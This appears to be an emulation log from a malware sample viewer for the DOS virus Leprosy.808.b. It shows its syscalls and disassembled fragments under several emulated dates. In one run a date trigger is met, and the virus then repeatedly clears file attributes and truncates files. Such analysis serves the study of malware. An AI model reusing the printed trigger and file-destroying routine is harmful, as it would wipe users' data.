Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.808.b

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:28:58.750729369Z 48 PC: 12b36 | Get DOS version
2018-12-17T22:28:58.75253861Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-17T22:28:58.754663208Z 26 PC: 12b49 | Set disk transfer address
2018-12-17T22:28:58.755630157Z 25 PC: 12b4d | Get default drive
2018-12-17T22:28:58.757611317Z 71 PC: 12b58 | Get current directory
2018-12-17T22:28:58.760448123Z 59 PC: 12b5f | Change current directory
2018-12-17T22:28:58.764332258Z 78 PC: 12b69 | Find first file
2018-12-17T22:28:58.776587221Z 87 PC: 12c4d | Get or set file date and time
2018-12-17T22:28:58.778110188Z 67 PC: 12c59 | Get or set file attributes
2018-12-17T22:28:58.783769699Z 59 PC: 12c60 | Change current directory
2018-12-17T22:28:58.78809214Z 59 PC: 12c67 | Change current directory
2018-12-17T22:28:58.790311952Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-17T22:28:58.792459706Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5173,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:54.881638772Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:53:54.88330098Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:53:54.885968218Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:53:54.887252761Z 25 PC: 12b4d | Get default drive
2018-12-25T11:53:54.888773701Z 71 PC: 12b58 | Get current directory
2018-12-25T11:53:54.8925151Z 59 PC: 12b5f | Change current directory
2018-12-25T11:53:54.896610823Z 78 PC: 12b69 | Find first file
2018-12-25T11:53:54.902497538Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:53:54.905228239Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:53:54.910998668Z 59 PC: 12c60 | Change current directory
2018-12-25T11:53:54.921199392Z 59 PC: 12c67 | Change current directory
2018-12-25T11:53:54.923777476Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:53:54.927723448Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5173,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:54.955989391Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:53:54.958416075Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:53:54.961580503Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:53:54.963080428Z 25 PC: 12b4d | Get default drive
2018-12-25T11:53:54.966312684Z 71 PC: 12b58 | Get current directory
2018-12-25T11:53:54.969537982Z 59 PC: 12b5f | Change current directory
2018-12-25T11:53:54.974365742Z 78 PC: 12b69 | Find first file
2018-12-25T11:53:54.98494021Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:53:54.986891481Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:53:54.994841568Z 59 PC: 12c60 | Change current directory
2018-12-25T11:53:54.999033519Z 59 PC: 12c67 | Change current directory
2018-12-25T11:53:55.001728381Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:53:55.004064504Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":25,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5173,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:55.463487166Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:53:55.465248602Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:53:55.469589071Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:53:55.471844146Z 25 PC: 12b4d | Get default drive
2018-12-25T11:53:55.474078718Z 71 PC: 12b58 | Get current directory
2018-12-25T11:53:55.477835634Z 59 PC: 12b5f | Change current directory
2018-12-25T11:53:55.482608146Z 78 PC: 12b69 | Find first file
2018-12-25T11:53:55.489412363Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:53:55.491878143Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:53:55.498293165Z 59 PC: 12c60 | Change current directory
2018-12-25T11:53:55.508518444Z 59 PC: 12c67 | Change current directory
2018-12-25T11:53:55.510946391Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:53:55.513423854Z 26 PC: 12c81 | Set disk transfer address
2018-12-25T11:53:55.514665987Z 78 PC: 12c8b | Find first file
2018-12-25T11:53:55.527070659Z 67 PC: 12c94 | Get or set file attributes
2018-12-25T11:53:55.537973319Z 60 PC: 12c9b | Create or truncate file
2018-12-25T11:53:55.566145642Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.570045839Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.581179411Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.604990181Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.608316125Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.619730835Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.633395932Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.636355055Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.647697312Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.661908175Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.664914632Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.68255687Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.697673004Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.701155344Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.712792865Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.727279911Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.730658252Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.743147519Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.756959596Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.760296288Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.771873372Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.786738229Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.789659343Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.800904425Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.814700668Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.818284735Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":26,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5173,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:55.847809541Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:53:55.849223211Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:53:55.855595806Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:53:55.856885317Z 25 PC: 12b4d | Get default drive
2018-12-25T11:53:55.858156739Z 71 PC: 12b58 | Get current directory
2018-12-25T11:53:55.862661407Z 59 PC: 12b5f | Change current directory
2018-12-25T11:53:55.86649588Z 78 PC: 12b69 | Find first file
2018-12-25T11:53:55.872118711Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:53:55.874902712Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:53:55.880450219Z 59 PC: 12c60 | Change current directory
2018-12-25T11:53:55.889181909Z 59 PC: 12c67 | Change current directory
2018-12-25T11:53:55.891914937Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:53:55.894990461Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')